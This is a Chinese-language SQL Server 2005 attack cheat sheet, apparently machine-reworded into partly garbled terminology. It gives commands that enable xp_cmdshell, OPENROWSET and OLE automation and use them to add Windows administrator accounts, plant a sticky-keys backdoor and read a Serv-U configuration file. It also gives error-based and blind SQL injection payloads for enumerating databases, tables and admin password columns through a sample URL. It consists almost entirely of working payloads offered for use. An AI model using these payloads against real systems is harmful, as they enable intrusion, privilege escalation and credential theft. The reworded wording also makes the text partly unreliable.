一.開啟擴(kuò)展

1.開啟xp_cmdshell

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

封鎖xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;--

dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
(添加xplog70.dll)

2.開啟'OPENROWSET'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;--

查詢闡明器里執(zhí)行select * from openrowset('microsoft.jet.oledb.4.0','
;database=c:/windows/system32/ias/ias.mdb',
'select shell("cmd.exe /c net user admin admin1234 /add")')來操作沙盤來添加個(gè)打點(diǎn)員

3.開啟'sp_oacreate'
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--

拷貝文件d:/windows/explorer.exe 至sethc.exe
declare @o int;exec sp_oacreate 'scripting.filesystemobject', @o out ;exec sp_oamethod @o, 'copyfile',null,'d:/windows/explorer.exe' ,'c:/sethc.exe';

在查詢闡明器里執(zhí)行
DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:/WINdows/system32/cmd.exe /c net user xcode xcode /add'
這段代碼就是操作SP_OAcreate來添加一個(gè)xcode的系統(tǒng)用戶 然后直接晉升為打點(diǎn)員權(quán)限

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:/Serv-U6.3/ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end
這段代碼就可以把ServUDaemon.ini里的設(shè)置信息全部顯示出來

二.有顯錯(cuò)，暴。

and 0<(select count(*) from master.dbo.sysdatabases);--折半法獲得數(shù)據(jù)庫個(gè)數(shù)

and 0<(select count(*) from master.dbo.sysdatabases where name>1 and dbid=1);--依次提交 dbid = 2.3.4... 獲得更多的數(shù)據(jù)庫名

and 0<(select count(*) name from employ.dbo.sysobjects where xtype='U');--折半法獲得表個(gè)數(shù)(假設(shè)暴出庫名employ)

and 0<(select top 1 name from employ.dbo.sysobjects where xtype='U');--爆出一個(gè)表名

假設(shè)暴出表名為"employ_qj"則在上面語句上加條件 and name not in ('employ_qj' 以此一直加條件...

and 0<(select top 1 name from syscolumns where id in (select id from sysobjects where type = 'u' and name = 'employ_qj'));--爆出一個(gè)列名

假設(shè)暴出字段名為"id"則在上面語句上加上條件 and name not is('id') 以此一直加條件....

可能

爆庫語句
and (select top 1 isnull(cast([name] as nvarchar(500)),char(32))+char(124) from [master].[dbo].[sysdatabases] where dbid in (select top N dbid from [master].[dbo].[sysdatabases] order by dbid desc))=0--

爆表語句,somedb部份是所要列的數(shù)據(jù)庫
and (select top 1 cast(name as varchar(200)) from (select top N name from somedb.sys.all_objects where type=char(85) order by name) t order by name desc)=0--

爆字段語句，爆表admin里user='admin'的暗碼段
And (Select Top 1 isNull(cast([password] as varchar(2000)),char(32))+char(124) From (Select Top N [password] From [somedb]..[admin] Where user='admin' Order by [password]) T Order by [password]Desc)=0--

三.無顯錯(cuò)，盲注。

先說下SQL2005中的查詢要領(lǐng)

select * from master.dbo.sysdatabases                --查詢數(shù)據(jù)庫

select * from NetBook.dbo.sysobjects where xtype='u'    --查詢數(shù)據(jù)庫NetBook里的表

select * from NetBook.dbo.syscolumns where id=object_id('book') --查詢book內(nèi)外的字段

判定權(quán)限：
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
and 1=(select IS_SRVROLEMEMBER('serveradmin'))
and 1=(select IS_SRVROLEMEMBER('setupadmin'))
and 1=(select IS_SRVROLEMEMBER('securityadmin'))
and 1=(select IS_SRVROLEMEMBER('diskadmin'))
and 1=(select IS_SRVROLEMEMBER('bulkadmin'))
and 1=(select IS_SRVROLEMEMBER('db_owner'))

盲注通例步調(diào)：

判定庫是否確實(shí)為MSSQL2005：
http://www.oldjun.com/oldjun.aspx?id=1 and substring((select @@version),22,4)='2005'

猜數(shù)據(jù)庫名：

先猜dbid：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
按照dbid猜庫名，先猜出長(zhǎng)度：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
再逐位猜：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1

猜表名（假設(shè)庫名已經(jīng)猜出為database）：

可以實(shí)驗(yàn)先看有沒打點(diǎn)表：
http://www.oldjun.com/oldjun.aspx?id=1 and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '%admin%')=1